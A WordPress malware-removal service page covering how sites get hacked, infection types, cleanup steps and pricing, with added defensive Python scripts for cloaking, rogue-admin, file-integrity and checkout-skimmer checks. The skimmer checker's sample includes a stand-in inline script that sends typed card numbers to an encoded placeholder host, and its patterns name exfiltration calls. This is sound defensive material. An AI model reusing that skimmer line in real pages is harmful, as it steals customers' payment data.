Key facts at a glance
WordPress security in 2026
- Plugins are the front door
- 91 percent of WordPress vulnerabilities are in plugins, per the Patchstack 2026 report, and exploitation of a disclosed critical flaw often begins within hours. An outdated or abandoned plugin is the most common way in.
- Weak passwords are the other half
- Around 81 percent of hacked WordPress sites involved weak or stolen passwords. Brute-force and credential-stuffing attacks are automated and run at massive scale around the clock.
- The 2026 supply-chain shift
- Even careful owners got hit. In 2026 attackers compromised plugin vendors and pushed backdoored code through trusted updates, including ShapedPlugin products and Gravity Forms, plus 30-plus plugins in an April 2026 attack.
- It often hides from you
- Redirect malware is frequently cloaked, firing only for mobile visitors, crawlers, or referral traffic, so the site looks normal in your browser while Google flags it. Trust Search Console over a quick self-check.
- Clearing the warning
- After the site is genuinely clean and hardened, a Google Search Console review removes the This site may be hacked warning, usually in one to three days. It only passes if the hidden backdoors are gone too.
- The mistake that causes reinfection
- Removing only the visible malware. Attackers leave a backdoor and a hidden admin account, so a site cleaned without finding those, deleting rogue users, regenerating the security keys, and patching the entry point is reinfected within days. Hardening is not optional; it is the cure.
Source: the Patchstack state of WordPress security report, the Sucuri guides on cleaning hacked WordPress and on hidden admin backdoors, security reporting on the 2026 plugin supply-chain attacks, the Google Search Central security documentation, and our hands-on cleanups.
How WordPress sites get hacked in 2026
WordPress runs a large share of the web, which makes it the most attacked platform there is, and the attacks are almost entirely automated. Bots scan the internet constantly for known vulnerabilities and weak logins, so a site does not need to be a target to be hit; it just needs to be reachable and out of date. Understanding the three main ways in is what lets a cleanup actually close the door rather than just sweep up.
The first and largest is vulnerable plugins and themes. The Patchstack 2026 report found that 91 percent of WordPress vulnerabilities live in plugins, and when a serious flaw is publicly disclosed, automated exploitation frequently begins within hours, faster than many site owners patch. An outdated plugin, an abandoned one still installed, or a nulled or pirated plugin with a backdoor baked in is the most common entry point by a wide margin. The second is credentials. Around 81 percent of hacked sites involved a weak or stolen password, because brute-force and credential-stuffing attacks cost the attacker almost nothing and run at enormous scale.
The third has grown sharply in 2026: the supply chain attack. Instead of breaking into your site, attackers compromise the plugin vendor and push backdoored code through the official update channel that every site trusts. In 2026 this hit popular professional plugins, including ShapedPlugin products and Gravity Forms with its roughly one million installations, and an April 2026 campaign backdoored more than 30 trusted plugins through tampered updates. The unsettling part is that doing the right thing, keeping plugins updated, is exactly how the malware got installed. It means a hacked site is not always a careless one, and it means the cleanup has to consider where a piece of malware actually came from.
Signs your site is hacked
WordPress malware is built to stay hidden, so the signs are often indirect. If you recognize any of these, treat the site as compromised and act, because the longer an infection sits, the more SEO and reputation damage it does and the deeper it embeds.
- ⚠ Visitors are redirected to spam, gambling, pharmaceutical, or adult sites
- ⚠ Google shows This site may be hacked or Deceptive site ahead in search results
- ⚠ Google Search Console reports a security issue, cloaking, or deceptive content
- ⚠ Admin users you did not create appear, or appear and then vanish from the list
- ⚠ A site: search (site:yourdomain.com) shows spam pages indexed under your domain that you never made
- ⚠ Randomly named files appear in wp-content/uploads or wp-includes
- ⚠ Your host suspended the account or flagged it for malware
- ⚠ The site is fine in your browser but customers or mobile users report redirects
- ⚠ Unexpected scripts or iframes appear in the header, footer, or theme files
- ⚠ A sudden, unexplained drop in search traffic or rankings
The most important one to internalize is the eighth: a site that looks perfectly normal to you can still be hacked. Redirect malware commonly cloaks itself, showing the infection only to mobile users, to Google crawlers, or to people who clicked through from a search result, while a desktop visit from the owner sees nothing wrong. That is why Google can flag your site while you are convinced it is fine. Believe the field reports.
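Because cloaked malware answers a phone, a crawler, or a visitor arriving from a search result differently from the owner's desktop browser, the check has to be made as those clients. The script below is an added example, not code from this page or from the company behind it: it requests one URL under several client profiles, pulls the redirect and injected-script indicators out of each response, and reports whatever the non-desktop profiles received that the desktop profile did not. The profile names, header strings, the `fetch` callback, and the sample responses in `sample_fetch` are assumptions constructed for the example.

```python
"""Cloaked-redirect check: fetch one URL under several client profiles and diff them.

Added example, not code from the page or its author. The profile names, the
header values, the `fetch` callback and the constructed sample responses are
all assumptions made for this example.
"""
import re
import sys
import urllib.request
from typing import Callable, Dict, List

# Client profiles: User-Agent and Referer sent with the request (constructed values).
PROFILES: Dict[str, Dict[str, str]] = {
    "desktop": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
                "Referer": ""},
    "mobile": {"User-Agent": "Mozilla/5.0 (Linux; Android 13) Mobile Chrome/120.0",
               "Referer": ""},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
                  "Referer": ""},
    "from_google": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
                    "Referer": "https://www.google.com/"},
}

# Redirect and injection indicators to pull out of a response. The FINAL-URL line is
# prepended by the fetcher so an HTTP-level redirect to another domain shows up too.
INDICATOR_PATTERNS = [
    re.compile(r"^FINAL-URL: (\S+)", re.M),
    re.compile(r"<meta[^>]+http-equiv=[\"']?refresh", re.I),
    re.compile(r"(?:window|document|top)\.location(?:\.href)?\s*=", re.I),
    re.compile(r"<script[^>]+src=[\"']([^\"']+)", re.I),
    re.compile(r"eval\s*\(|atob\s*\(|fromCharCode|unescape\s*\(", re.I),
]


def extract_indicators(body: str) -> List[str]:
    """Return the sorted, de-duplicated indicators found in one response."""
    found = set()
    for pat in INDICATOR_PATTERNS:
        for m in pat.finditer(body):
            found.add(m.group(1) if m.groups() else m.group(0).lower())
    return sorted(found)


def default_fetch(url: str, headers: Dict[str, str]) -> str:
    """Fetch url with the given headers (following redirects) and prepend the final URL."""
    req = urllib.request.Request(url, headers={k: v for k, v in headers.items() if v})
    with urllib.request.urlopen(req, timeout=15) as resp:
        body = resp.read().decode("utf-8", errors="replace")
        return f"FINAL-URL: {resp.geturl()}\n{body}"


def cloaking_report(url: str, fetch: Callable[[str, Dict[str, str]], str] = default_fetch,
                    baseline: str = "desktop") -> Dict[str, List[str]]:
    """Map each non-baseline profile to the indicators it received that the baseline did not."""
    results = {name: set(extract_indicators(fetch(url, hdrs))) for name, hdrs in PROFILES.items()}
    base = results[baseline]
    return {name: sorted(inds - base) for name, inds in results.items()
            if name != baseline and inds - base}


def sample_fetch(url: str, headers: Dict[str, str]) -> str:
    """Constructed responses standing in for a site with a mobile/crawler-only redirect."""
    clean = ("FINAL-URL: https://shop.example/\n<html><head>"
             "<script src='/wp-includes/js/jquery.js'></script></head><body>ok</body></html>")
    ua = headers["User-Agent"]
    if "Mobile" in ua:   # JavaScript redirect served only to phones
        return clean.replace("</head>", "<script>window.location.href='https://spam.example/';</script></head>")
    if "Googlebot" in ua:  # HTTP-level redirect served only to the crawler
        return "FINAL-URL: https://spam.example/landing\n<html><body>buy pills</body></html>"
    return clean


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    report = cloaking_report(target) if target else cloaking_report("https://shop.example/", sample_fetch)
    for profile, extra in report.items():
        print(f"{profile}: extra indicators vs desktop -> {extra}")
```

Run it with a URL to test a live site, or with no argument to see the constructed case, where the mobile profile gets a JavaScript redirect and the crawler profile is bounced to another domain while the desktop view stays clean. An empty report is not proof of a clean site (cloaking can also key on IP ranges or time), which is why Search Console remains the authority; a non-empty one is a reliable sign that something is serving different content to different visitors.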
The infections we remove
WordPress malware comes in a handful of recognizable families. Most real infections are a combination, a visible payload plus a quiet backdoor, and a thorough cleanup deals with both.
Redirect Hacks
Visitors sent to spam, gambling, pharma, or adult sites. Usually cloaked to fire only for mobile, crawlers, or referral traffic, and obfuscated with base64 or minified JavaScript so it hides from casual review.
Pharma Hacks and SEO Spam
Hidden spam links and pages injected into your content and database, concealed with CSS or off-screen positioning, pointing at pharmaceutical, gambling, or counterfeit-goods sites to abuse your search ranking.
Hidden Admin Backdoors
A backdoor creates an administrator account with the attacker's credentials and writes code to hide that user from your dashboard, giving a permanent secret entrance that survives plugin updates.
Credit Card Skimmers
JavaScript injected into the checkout that copies customer card details as they type and sends them to the attacker. Built to evade detection and often active only on the payment page. The most damaging store infection.
Malicious File Backdoors
Randomly named PHP files in uploads, wp-includes, or the theme, plus malicious cron jobs, that let the attacker re-execute code. The reinfection engine behind most repeat hacks.
Database Injections
Spam, scripts, or redirects written directly into wp_options, wp_posts, or widget content, which survive a file-only cleanup. We clean the database, not just the files.
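The two families above share a fix: look at the database directly rather than through the dashboard. A hidden-admin backdoor hides its account from the user list in wp-admin, but it cannot hide the capabilities row in the usermeta table from a direct query, and spam or redirect code written into options, posts, or widgets is found by scanning those tables for patterns that legitimate content rarely contains. The following is an added example, not the page's or any named vendor's code: the SQL is standard and runs unchanged against the real MySQL tables, while sqlite3 is used only so the example runs offline against a constructed copy of the four tables. The `wp_` prefix, the injection patterns, and every sample row are assumptions.

```python
"""Audit the WordPress database directly for rogue admins and injected content.

Added example, not code from the page or any project it names. sqlite3 stands in
for MySQL so the constructed tables run offline; the queries themselves are plain
SQL. The table prefix, patterns and sample rows are assumptions.
"""
import re
import sqlite3
from typing import Iterable, List, Tuple

PREFIX = "wp_"  # assumption: default prefix; check wp-config.php for $table_prefix

# Patterns that rarely belong in legitimate post, option or widget content.
INJECTION_RE = re.compile("|".join([
    r"<script[^>]*src=",
    r"eval\s*\(",
    r"base64_decode|atob\s*\(",
    r"display\s*:\s*none.*?<a\s",           # hidden spam links
    r"(?:window|document)\.location",
]), re.I | re.S)


def list_admins(conn: sqlite3.Connection) -> List[Tuple[int, str, str]]:
    """(ID, login, registered) for every account whose capabilities grant administrator.

    The dashboard list can be filtered by a malicious hook; the usermeta row cannot.
    """
    sql = f"""
        SELECT u.ID, u.user_login, u.user_registered
        FROM {PREFIX}users u
        JOIN {PREFIX}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = '{PREFIX}capabilities'
          AND m.meta_value LIKE '%administrator%'
        ORDER BY u.ID
    """
    return conn.execute(sql).fetchall()


def unexpected_admins(conn: sqlite3.Connection, known_logins: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Admin accounts that are not on the owner's list of legitimate administrators."""
    known = set(known_logins)
    return [row for row in list_admins(conn) if row[1] not in known]


def scan_injected_content(conn: sqlite3.Connection) -> List[Tuple[str, object]]:
    """Rows in options (widgets live here) and posts matching the injection patterns."""
    hits: List[Tuple[str, object]] = []
    for name, value in conn.execute(f"SELECT option_name, option_value FROM {PREFIX}options"):
        if value and INJECTION_RE.search(value):
            hits.append(("option", name))
    for post_id, content in conn.execute(f"SELECT ID, post_content FROM {PREFIX}posts"):
        if content and INJECTION_RE.search(content):
            hits.append(("post", post_id))
    return hits


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample with the relevant columns of the four WordPress tables."""
    conn = sqlite3.connect(":memory:")
    c = conn.cursor()
    c.execute(f"CREATE TABLE {PREFIX}users (ID INTEGER, user_login TEXT, user_registered TEXT)")
    c.execute(f"CREATE TABLE {PREFIX}usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    c.execute(f"CREATE TABLE {PREFIX}options (option_name TEXT, option_value TEXT)")
    c.execute(f"CREATE TABLE {PREFIX}posts (ID INTEGER, post_content TEXT)")
    c.executemany(f"INSERT INTO {PREFIX}users VALUES (?,?,?)", [
        (1, "owner", "2021-03-02 10:00:00"),
        (2, "editor_jane", "2022-06-14 09:30:00"),
        (7, "wp_supp0rt", "2026-04-18 03:12:44"),   # constructed rogue account
    ])
    c.executemany(f"INSERT INTO {PREFIX}usermeta VALUES (?,?,?)", [
        (1, f"{PREFIX}capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, f"{PREFIX}capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (7, f"{PREFIX}capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    c.executemany(f"INSERT INTO {PREFIX}options VALUES (?,?)", [
        ("siteurl", "https://shop.example"),
        ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:58:"<script src="https://cdn.example-spam.test/r.js"></script>";}}'),
    ])
    c.executemany(f"INSERT INTO {PREFIX}posts VALUES (?,?)", [
        (10, "<p>Welcome to our store.</p>"),
        (11, '<p>Sale</p><div style="display:none"><a href="https://pharma.example-spam.test">cheap pills</a></div>'),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("admins not on the known list:", unexpected_admins(db, {"owner"}))
    print("rows with injected content:", scan_injected_content(db))
```

The registration timestamp in `list_admins` is worth reading alongside the login: a rogue account created at 03:12 on the morning the redirect started is usually the hidden admin. Treat every hit from `scan_injected_content` as a lead to read by hand rather than a verdict; the patterns are deliberately broad, and a legitimate page builder can match one of them.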
Defacements
Your homepage replaced or altered with the attacker's message or content. Visible and embarrassing, but usually paired with a quieter backdoor that is the real problem to remove.
Phishing Pages
Fake login or banking pages hidden in a subfolder of your site to harvest victims' credentials, which can get your domain blocklisted and your host to suspend you.
Spam Email and Mailer Scripts
Hidden scripts that use your server to send spam, which lands your domain on blocklists and breaks your legitimate email. We find and remove the mailer and its loader.
Cryptominers
Code that hijacks your server or your visitors' browsers to mine cryptocurrency, slowing the site and spiking resource use until the host throttles or suspends the account.
Fake or Malicious Plugins
A plugin disguised as a security or utility tool that is actually the backdoor, or a legitimate plugin compromised in a supply chain attack and updated to carry malware.
Compromised Admin and FTP Users
Unauthorized accounts the attacker created to get back in. Left in place, they reinfect the site within days, which is why deleting them is part of every cleanup.
Match your symptom to the fix
Pick the row that matches what you are seeing. Each one links to the diagnostic for that specific kind of infection.
| Symptom | Likely cause and fix |
|---|---|
| Visitors are redirected to spam, but the site looks fine when you visit | A cloaked redirect hack, firing only for mobile, crawlers, or referral traffic, with obfuscated code in the theme, .htaccess, or database. We find and remove it, then close the entry point. |
| Google shows This site may be hacked, or flags a security issue in Search Console | Malware Google has detected, often SEO spam or a redirect. We clean it completely, then submit the Search Console review to remove the warning. |
| Spam pages or pharmaceutical links are indexed under your domain | A pharma hack or SEO-spam injection, hidden with CSS or off-screen and pointing at encoded spam URLs. We remove the injected content and the backdoor feeding it. |
| You keep getting reinfected days after cleaning the site yourself | A backdoor and a hidden admin user were left behind. Removing visible malware is not enough. We find every backdoor, delete unauthorized users, and harden so it cannot return. |
| Your WooCommerce store may be leaking customer card details | A JavaScript skimmer on the checkout, built to evade detection and activate only at payment. We scan the checkout flow specifically and remove the skimmer and its backdoor. |
| Your site fell out of Google entirely after the hack | A hacked site can be deindexed or penalized once Google detects the malware. We clean and harden, then work the reindexing and review path to recover visibility. |
Why cleanup without hardening fails
This is the single most important thing to understand about a hacked WordPress site, and it is why so many do-it-yourself cleanups fail. The malware you can see, the redirect, the spam, the defacement, is the payload. It is not the infection. Underneath it, the attacker has almost always planted two things designed to survive your cleanup: a backdoor, a hidden piece of code that lets them run commands or re-upload malware at will, and a hidden administrator account that does not appear in your user list.
So the common story goes like this. You notice the redirect, you find and delete the obvious malicious code, the site looks clean, and you breathe out. A few days later it is hacked again, identically, and it feels like the cleanup did nothing. It did remove the payload. But the backdoor and the ghost admin were still there, so the attacker simply walked back in through the door you never found and reinstalled everything. Security researchers are blunt about this: without hardening, the same access that let the malware in allows reinfection within days.
Hardening means finding and removing every backdoor and malicious cron job, deleting every unauthorized admin and FTP user, regenerating the WordPress security keys so any stolen login session is invalidated, and patching or replacing the vulnerable or compromised plugin that was the entry point. Remove the malware and do none of that, and you are cleaning the same site again next week. This is the half of the work that a quick automated scan does not do, and the half we never skip.
How we clean and harden
Every cleanup follows the same disciplined sequence, because skipping a step is how infections come back.
We scan the files, the database, and the checkout flow, and compare your core, theme, and plugin files against known-clean versions to surface every injected or foreign file, including the cloaked and obfuscated code that casual scans miss.
We put the site in maintenance mode where appropriate and take a full backup of the compromised state first, so the cleanup is reversible and nothing is lost, then work without exposing visitors to the infection.
We clean the redirect or spam, replace compromised core files, disinfect the theme, plugins, uploads, .htaccess, and wp-config, and clean malicious content injected directly into the database. Files and database both, not one or the other.
We hunt down the backdoors, malicious cron jobs, and the hidden admin and FTP accounts the attacker left, and remove them. This is the step that stops reinfection, and the step a quick scan skips.
We identify how the attacker got in, a vulnerable or compromised plugin, a weak password, a supply-chain update, and patch or replace it, because cleaning without closing the door just resets the clock.
We update everything, remove unused plugins and themes, regenerate the WordPress security keys to invalidate any stolen sessions, enforce strong passwords and two-factor on admin accounts, and set up a firewall and ongoing scanning.
Once the site is genuinely clean and hardened, we submit the Google Search Console review to remove the This site may be hacked warning, and check that your domain is off any email or security blocklists.
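Three of the steps in that sequence are mechanical enough to script: comparing the site's files against a known-clean baseline to surface modified, deleted, and foreign files; flagging executable PHP that has no business under wp-content/uploads; and rewriting the eight security keys in wp-config.php so every existing login cookie stops working. The block below is an added example that is not the page's or the company's own tooling. The manifest format (relative path to SHA-256), the file layout, and the constructed sample site are assumptions; on a real site the baseline hashes come from the matching official release archive of core, theme, and each plugin.

```python
"""Baseline comparison, foreign-file hunt and salt regeneration for a WordPress tree.

Added example, not code from the page or any project it names. The manifest
format, the sample tree and the placeholder file contents are assumptions
constructed so the example runs offline in a temporary directory.
"""
import hashlib
import re
import secrets
import tempfile
from pathlib import Path
from typing import Dict, List

SALT_KEYS = ["AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"]
SALT_LINE = re.compile(r"define\(\s*'(" + "|".join(SALT_KEYS) + r")'\s*,\s*'[^']*'\s*\);")
PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)$", re.I)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Hash every file under root, keyed by forward-slash relative path."""
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in root.rglob("*") if p.is_file()}


def compare_to_baseline(site: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify files as modified, missing (in baseline, not on disk) or foreign (on disk only)."""
    current = build_manifest(site)
    return {
        "modified": sorted(p for p, h in current.items() if p in baseline and baseline[p] != h),
        "missing": sorted(p for p in baseline if p not in current),
        "foreign": sorted(p for p in current if p not in baseline),
    }


def php_in_uploads(site: Path) -> List[str]:
    """Executable PHP under wp-content/uploads is a classic dropper location; list it."""
    uploads = site / "wp-content" / "uploads"
    return sorted(p.relative_to(site).as_posix() for p in uploads.rglob("*")
                  if p.is_file() and PHP_EXT.search(p.name))


def regenerate_salts(config_text: str) -> str:
    """Replace every define('<KEY or SALT>', '...') in wp-config.php with a fresh random value."""
    def repl(m: re.Match) -> str:
        return f"define('{m.group(1)}', '{secrets.token_urlsafe(48)}');"
    return SALT_LINE.sub(repl, config_text)


def build_sample_site(root: Path) -> Dict[str, str]:
    """Constructed site: write a clean tree, take its manifest, then simulate an infection."""
    clean = {
        "wp-includes/version.php": "<?php $wp_version = 'x.y';\n",
        "wp-content/themes/shop/functions.php": "<?php add_theme_support('title-tag');\n",
        "wp-content/uploads/2026/04/hero.jpg": "JPEGDATA",
    }
    for rel, body in clean.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    baseline = build_manifest(root)
    # Simulated infection (placeholder contents only): theme edited, PHP dropped in uploads, core file deleted.
    (root / "wp-content/themes/shop/functions.php").write_text("<?php /* constructed stand-in for an injected loader */\n")
    (root / "wp-content/uploads/2026/04/wp-cache.php").write_text("<?php /* constructed stand-in for a dropped file */\n")
    (root / "wp-includes/version.php").unlink()
    return baseline


def demo() -> Dict[str, object]:
    """Run the file checks against the constructed site in a temporary directory."""
    root = Path(tempfile.mkdtemp())
    baseline = build_sample_site(root)
    return {"diff": compare_to_baseline(root, baseline), "php_in_uploads": php_in_uploads(root)}


if __name__ == "__main__":
    print(demo())
    sample_cfg = "define('AUTH_KEY', 'put your unique phrase here');\ndefine('DB_NAME', 'wp');\n"
    print(regenerate_salts(sample_cfg))
```

For core files WP-CLI's `wp core verify-checksums` performs the same comparison against the official checksums, and `wp config shuffle-salts` regenerates the keys; the example spells the logic out so it can be applied to themes and plugins with a baseline you built from the release archive yourself. The "foreign" list is where injected loaders and dropped files show up, so review every entry rather than only the ones with suspicious names.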
Why specialist cleanup beats a scan
A security scanner is a useful tool and a poor cleanup. It is good at flagging known-bad signatures, but modern WordPress malware is obfuscated and often novel, so a scan misses the cloaked redirect, the freshly minted backdoor, and the database injection it does not have a signature for. More importantly, a scanner does not find the entry point, does not delete the ghost admin, and does not harden anything, which is exactly why sites cleaned by an automated tool alone so often come back infected. The scan removes what it recognizes and leaves the rest.
We do this work all day, so the process is the same every time and it is thorough by default. Compare every file against a known-clean baseline. Read the obfuscated code rather than trusting a signature. Clean the database as well as the files. Hunt the backdoors and rogue users specifically. Trace and close the entry point. Harden so it cannot recur. We charge a flat rate because we are fast and complete at this specific work, and because a hacked site is an emergency that should not come with an open-ended bill.
The 2-hour guarantee and the money-back promise are the enforcement. We do not get paid if we cannot get the site clean, which keeps us honest about scope on a badly compromised site. If an infection is so deep that a clean rebuild is the right call, we tell you that up front rather than charging to chase malware through a site that should be rebuilt.
Specific security fixes
The exact symptom points at a specific diagnostic. Click through to the one for yours.
My WordPress site is hacked
Redirects, defacement, a Google warning, or unknown admin users. Full diagnosis and the complete cleanup-and-harden process.
Fix a hacked site →
Malware, SEO spam, or reinfection
Injected spam, backdoors, and the repeat-infection cycle. We remove it across files and database and close the door for good.
Remove WordPress malware →
Site deindexed or penalized after a hack
Google dropped the site once it detected the malware. We clean, harden, and work the review and reindexing path.
Recover from deindexing →
Full security cleanup service
The complete service: remove the infection, close the entry point, delete backdoors, harden, and clear warnings.
See the security service →
Pricing and process
Tell us what you are seeing
Use the quote form with your URL and the symptom, a redirect, a Google warning, unknown admins. A senior engineer assesses the infection and replies with a flat-rate quote, usually within 30 minutes during business hours.
Approve, we start immediately
No scheduling step, no kickoff call. Approve the quote and we begin. You provide hosting and admin access through a secure link. The clock starts on the 2-hour guarantee.
Clean, hardened, and verified
We remove the malware and the backdoors, close the entry point, harden the site, and submit the Google review. We tell you exactly what was wrong and how it got in. Money back if we cannot clean it.
WordPress malware FAQ
How much does WordPress malware removal cost in 2026?
WordPress malware removal at Instant Nerds is flat rate, $49 to $149 depending on the infection. A contained redirect or SEO-spam cleanup is usually $99, and a deeper infection with backdoors, a skimmer, or a database injection is $99 to $149. There is no hourly billing and no surprise add-ons. You get the quote before we start, and the work always includes the three things that actually matter: removing every piece of malware, finding and closing the entry point so it cannot come straight back, and hardening the site against reinfection. If we cannot clean it, you pay nothing.
How do I know my WordPress site is actually hacked?
The clearest signs are visitors redirected to spam, gambling, pharmaceutical, or adult sites, a Google warning like This site may be hacked or Deceptive site ahead, a security issue flagged in Google Search Console, admin users you did not create, spam pages indexed under your domain that you can find with a site: search (site:yourdomain.com), or your host suspending the account. The tricky part is that a lot of WordPress malware hides from you specifically. Redirect hacks are often cloaked, firing only for mobile visitors, search engine crawlers, or people arriving from Google, so your own quick visit from your desktop looks completely normal while real visitors and Google see the infection. If Search Console or your customers report a problem, trust that over your own browser check.
Why does my site keep getting reinfected after I clean it?
Because the malware you can see is not the whole infection. Attackers almost always leave a backdoor, a hidden piece of code that gives them a permanent secret way back in, and a hidden administrator account that does not show in your user list. If you remove the visible redirect or spam but leave the backdoor and the ghost admin, the attacker simply walks back in and reinfects the site, often within days. This is the single most common reason a cleanup fails. Removing malware is only half the job. The other half is finding and closing every backdoor, deleting every unauthorized admin and FTP user, regenerating the security keys to invalidate stolen sessions, and patching the vulnerability that let them in. We do all of it, because cleaning without hardening guarantees you will be hacked again.
How did my site get hacked in the first place?
Almost always one of three ways. First, a vulnerable plugin or theme: 91 percent of WordPress vulnerabilities are in plugins per the Patchstack 2026 report, and when a critical flaw is disclosed, automated exploitation often begins within hours, so an outdated or abandoned plugin is the most common door. Second, a weak or stolen password: around 81 percent of hacked WordPress sites involved weak or reused credentials, and brute-force and credential-stuffing attacks run fully automated at massive scale. Third, and increasingly in 2026, a supply chain attack, where the malware arrived inside a legitimate plugin update from a trusted source. Part of our cleanup is identifying which of these let the attacker in, because if we do not close that door, cleaning the site only buys you a few days.
My plugins are all reputable and updated. How was I still hacked?
In 2026 that can still happen because of supply chain attacks, and it is not your fault. Attackers have learned to compromise the plugin vendor rather than your site, then push backdoored code through the official update channel that everyone trusts. In 2026 alone, popular pro plugins including ShapedPlugin products and Gravity Forms, which has around a million installations, were compromised this way, and an April 2026 attack backdoored more than 30 trusted plugins through tampered updates. If you updated a plugin during the window when its release was compromised, you installed the malware yourself by doing exactly the right thing. The fix is the same as any infection: remove the malicious code, replace the affected plugin with a known-clean version, close any backdoor it planted, and harden. We track these incidents and check whether your infection traces to one.
Will you remove the Google This site may be hacked warning?
Yes, and it is part of every cleanup. Once the site is genuinely clean and hardened, we submit a review request through Google Search Console, under Security Issues, confirming the problems are resolved. Google typically processes these within one to three days for a site with an otherwise clean record, and the warning is removed from your search listings once it passes. The important sequence is that the review only succeeds if the site is actually clean, including the hidden backdoors, so a rushed cleanup that leaves malware behind gets the review rejected and the warning stays. We make sure the site passes the first time by cleaning it completely before we request the review.
Should I just restore from a backup instead of cleaning?
A clean backup from before the infection is a legitimate fast path, but only if three things are true. You need a backup from genuinely before the malware arrived, which is harder than it sounds because infections often sit quietly for weeks before doing anything visible, so a recent backup may already be infected. You need to not lose the content, orders, and changes made since that backup. And, crucially, restoring a backup does nothing about the vulnerability that let the attacker in, so if you restore and do not patch and harden, you get reinfected through the same door. When a clean pre-infection backup exists and the data loss is acceptable, we will use it and then harden. When it is not, we clean the live site file by file. Either way the hardening step is what actually keeps you safe.
My store takes payments. Could a hack be stealing card details?
It is one of the most damaging infections and worth checking urgently. Credit card skimmers are JavaScript injected into the checkout that quietly copies customers' card details as they type and sends them to the attacker, and they are deliberately built to evade detection, often only activating on the checkout page and heavily obfuscating their code. A store can look and function perfectly while skimming every transaction. The signs are subtle: an unfamiliar script on the checkout, an unexpected external request when a card is entered, or a payment processor or customer reporting fraud traced to your site. If you run WooCommerce or any checkout, a skimmer is the infection you most want ruled out, both for your customers and for your liability. We scan the checkout flow specifically and remove any skimmer along with the backdoor that planted it.
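The two signs named above, an unfamiliar script on the checkout and an unexpected external request when a card is entered, translate into an inventory check: every external script on the payment page must come from an origin you expect, and any inline script that both touches the card fields and uses obfuscation or a request primitive deserves a manual read. The script below is an added example, not code from this page or from Instant Nerds; the allowlist, the hostnames, the heuristics, and the constructed sample checkout HTML (including the stand-in inline script it flags) are assumptions made for the example.

```python
"""Inventory the scripts on a checkout page against an allowlist of expected origins.

Added example, not from the page or any named vendor. Hostnames, the allowlist,
the heuristics and the sample checkout markup are constructed assumptions.
"""
import re
from typing import Dict, Iterable, List
from urllib.parse import urlparse

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""src\s*=\s*["']([^"']+)""", re.I)
# Three things legitimate checkout code rarely combines in one inline block.
HEURISTICS = [
    ("card-fields", re.compile(r"card[-_ ]?number|cvv|cvc|expir", re.I)),
    ("obfuscation", re.compile(r"atob\s*\(|fromCharCode|unescape\s*\(|eval\s*\(|\\x[0-9a-f]{2}", re.I)),
    ("exfiltration", re.compile(r"fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(", re.I)),
]


def audit_checkout_scripts(html: str, page_host: str, allowed_hosts: Iterable[str]) -> Dict[str, List[str]]:
    """Report external scripts from unexpected origins and inline scripts hitting two or more heuristics."""
    allowed = set(allowed_hosts) | {page_host}
    report: Dict[str, List[str]] = {"unexpected_external": [], "suspicious_inline": []}
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname   # None for same-origin relative paths
            if host and host not in allowed:
                report["unexpected_external"].append(src.group(1))
        elif body.strip():
            flags = [name for name, pat in HEURISTICS if pat.search(body)]
            if len(flags) >= 2:
                report["suspicious_inline"].append(",".join(flags))
    return report


# Constructed checkout page: one unknown CDN script and one inline stand-in for a skimmer.
SAMPLE_CHECKOUT = """
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://pay.processor.example/v1.js"></script>
<script src="https://static.example-cdn.test/analytics.js"></script>
<script>
  document.querySelector('#card-number').addEventListener('input', function (e) {
    new Image().src = atob('aHR0cHM6Ly9leGFtcGxlLnRlc3Q=') + '?d=' + encodeURIComponent(e.target.value);
  });
</script>
<script>document.querySelector('#card-number').focus();</script>
"""

if __name__ == "__main__":
    print(audit_checkout_scripts(SAMPLE_CHECKOUT, "shop.example", ["pay.processor.example"]))
```

The last inline script in the sample only touches the card field, which is normal checkout behaviour, so it is not reported; the one before it also decodes a hidden destination and fires an image request as the customer types, which is the pattern to read by hand. Feed the function the HTML of the live checkout page as a customer would receive it, with the allowlist limited to your own domain and your payment processor.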
Sources and further reading
The security data and incident details on this page come from the Patchstack research, Sucuri security guides, security reporting on the 2026 plugin supply-chain attacks, and Google Search Central.
- Patchstack: State of WordPress Security report (plugins as the dominant vulnerability source)
- Sucuri: How to clean a hacked WordPress site
- Sucuri: Hidden WordPress backdoors creating admin accounts
- The Hacker News: ShapedPlugin WordPress pro plugins backdoored in supply-chain attack (2026)
- Google Search Central: Security issues and hacked content